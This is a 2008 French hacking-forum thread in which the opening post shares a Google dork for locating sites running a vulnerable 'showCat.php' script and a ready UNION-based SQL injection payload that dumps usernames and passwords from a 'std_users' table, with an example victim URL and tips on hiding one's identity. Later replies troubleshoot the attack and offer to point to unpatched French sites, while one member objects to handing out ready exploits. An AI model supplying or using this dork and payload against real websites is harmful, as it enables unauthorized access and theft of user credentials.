exploit sql injection ( tt la base de donn?e sera a votre..)

Moderator: Mod

exploit sql injection ( tt la base de donnée sera a votre..

Postby r00t_shell » Sun Mar 30, 2008 9:44 am

c'est mon premier seujet ds ce forum :

type de faille : SQL injection

chercher ds internet : allinurl: "showCat.php?cat_id"

date de publication : [2008-03-21] ;)


EXPLOIT :

showCat.php?cat_id=-99999/**/union/**/select/**/0,concat(user_name,0x3a,password),2/**/from/**/std_users/*

exemple :

http://www.victime.com/showCat.php?cat_id=-99999/**/union/**/select/**/0,concat(user_name,0x3a,password),2/**/from/**/std_users/*


bonne exploit mais rester prudent car a mon avis avant de pratiquer hack il faut savoir comment cacher votre identité ds le net ;) car il y tjrs log.file

merci a tous


je cherche des amis pour l'echange d'information



\\___________I'm Not A Hacker__________________//

\\___________I'm just a Man Of Security __________________//



\\___________megharba tal moooooootttttttt_____________///
r00t_shell
Projets
 
Posts: 4
Joined: Sun Mar 30, 2008 8:54 am

Postby Manu404 » Sun Mar 30, 2008 11:01 am

[code:1:30d4abb98b]bonne exploit mais rester prudent car a mon avis avant de pratiquer hack il faut savoir comment cacher votre identité ds le net Wink car il y tjrs log.file [/code:1:30d4abb98b]
A bon ??? :wink:
[quote:30d4abb98b]
je cherche des amis pour l'echange d'information [/quote:30d4abb98b]
Tu es au bon endroit

Sinon pas de commentaire...
Il a fait "ses preuves" et peut s'avere utilie
User avatar
Manu404
 
Posts: 2219
Joined: Tue Feb 26, 2008 3:44 pm
Location: ::1:

Postby baltazare » Mon Mar 31, 2008 9:12 am

Elle est deja sur ce forum cette exploit je croit.
En tout cas un gros deja vu depuis quelque jours.

j'editerai mon message.

EDIT/
http://hackbbs.org/phpBB2/viewtopic.php?t=877

Exploit deja ecrite dans cette meme partie.
a deplacer!!
User avatar
baltazare
 
Posts: 607
Joined: Mon Sep 03, 2007 10:27 am

Postby Otherdoze » Tue Apr 01, 2008 11:23 am

Problème, je marque ce que tu a écrit dans la barre URL mais sa marche pas, il me mette erreur 404

Il y a un truc spécial, un prog, ou des truc comme ça à avoir ??

Parce que moi sa marche pas :cry:
User avatar
Otherdoze
Projets
 
Posts: 12
Joined: Sat Mar 08, 2008 4:00 pm

Postby baltazare » Tue Apr 01, 2008 1:25 pm

Si erreur 404, sa veut dire que le forum est patcher ou non valide pour ce type d'exploit (mauvaise version...)

Va sur le lien que j'ai donner, ce topic n'a pas lieu d'etre il existe deja!
User avatar
baltazare
 
Posts: 607
Joined: Mon Sep 03, 2007 10:27 am

pour Otherdoze

Postby Guest » Tue Apr 01, 2008 1:57 pm

cher ami Otherdoze il y plusieurs sites qui n'on pas encore patcher site faille dont 2 est sont des sites francaicais
alors il suffit de cherche et tu trouve ;)

si ca marche pas je peux te donne un exemple sure un site lol :D
Guest
 

xhunter

Postby xhunter » Sat Apr 12, 2008 7:34 pm

nice work !
nice tuto !
+1
User avatar
xhunter
Projets
 
Posts: 44
Joined: Fri Dec 28, 2007 9:25 pm

Postby zn416 » Sat May 31, 2008 1:05 am

Incroyable, une sacrée faille
zn416
Projets
 
Posts: 3
Joined: Sat May 31, 2008 12:44 am

Postby Ness » Sat May 31, 2008 6:04 pm

Donner les faille toute prete pour les SK je suis pas pour ... m'enfin ..

De plus tu aurais peut etre pu expliquer cette sql injection ou en creer un exploit en perl ou php ...

A+
User avatar
Ness
Projets
 
Posts: 61
Joined: Sun Apr 27, 2008 12:44 am


Return to Sécurité Intrusion

Who is online

Users browsing this forum: No registered users and 2 guests

cron